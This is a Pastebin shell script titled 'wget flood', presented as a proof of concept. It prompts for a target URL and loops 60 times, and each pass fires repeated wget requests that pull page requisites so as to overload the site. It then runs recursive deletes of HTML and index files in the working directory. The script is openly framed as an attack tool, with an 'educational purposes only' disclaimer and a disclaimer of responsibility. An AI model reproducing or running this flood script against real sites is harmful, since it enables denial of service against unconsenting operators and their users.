Advertisement
1337ings

[Shell] wget flood

Oct 7th, 2016
1,503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1. #!/bin/sh
  2. # ___________________________________________
  3. #
  4. # This is a PoC in wget, anyone in the right mind
  5. # could have brought this to their attention,
  6. # so ill be the pround creator of the wget flood concept
  7. # ___________________________________________
  8. #
  9. # wget will need to be installed
  10. #
  11. # yum install wget
  12. #
  13. # apt-get install wget
  14. #
  15. # ___________________________________________
  16. #
  17. # Normal execution would be;
  18. #
  19. # sh wgetflood.sh
  20. # ___________________________________________
  21. #
  22. # You will then need to input your url you would like to attack.
  23. # Note: This is for educational purposes only.
  24. # ___ _ _ _ _____ ___
  25. # / __|_ _ ___ __| (_) |_ ___ / / _ )_ _ __ _ __|__ \
  26. # | (__| '_/ -_) _` | | _(_-</ /| _ \ || / _` (_-< /_/
  27. # \___|_| \___\__,_|_|\__/__/_/ |___/\_,_\__, /__/(_)
  28. # |___/
  29. #
  30. # I'm not responsible for any misuse of this program.
  31. # All credits goes to Chris Poole | @codingplanets on twitter
  32. # Please report any bugs via twitter.
  33. #_____________________________________________________________
  34.  
  35. echo """
  36. /!\ Welcome to WGET FLOOD /!\
  37. __ _______ ______ _______ ______ _ ____ ____ _____
  38. \ \ / / ____| ____|__ __| | ____| | / __ \ / __ \| __ \
  39. \ \ /\ / / | __| |__ | | | |__ | | | | | | | | | | | |
  40. \ \/ \/ /| | |_ | __| | | | __| | | | | | | | | | | | |
  41. \ /\ / | |__| | |____ | | | | | |___| |__| | |__| | |__| |
  42. \/ \/ \_____|______| |_| |_| |______\____/ \____/|_____/
  43.  
  44.  
  45. """
  46. echo """
  47. /!\ Please enter target /!\
  48. """
  49. echo "root@wgetflood:~# "
  50. read target
  51. for i in {1..60}; do echo " __________________________________________"; echo " Attack is starting, Please wait 30 minutes."; echo " /!\ C O D E D B Y Chris Poole | @codingplanets /!\ "; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; wget $target --page-requisites --limit 300 -q -B -c --delete-after --no-check-certificate --max-redirect 600 --auth-no-challenge --timeout 5 --dns-timeout 2 --wait 5; rm -rf *html; rm -rf index*; done
  52. echo """
  53. Attack is done. CTRL + C to exit.
  54. """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement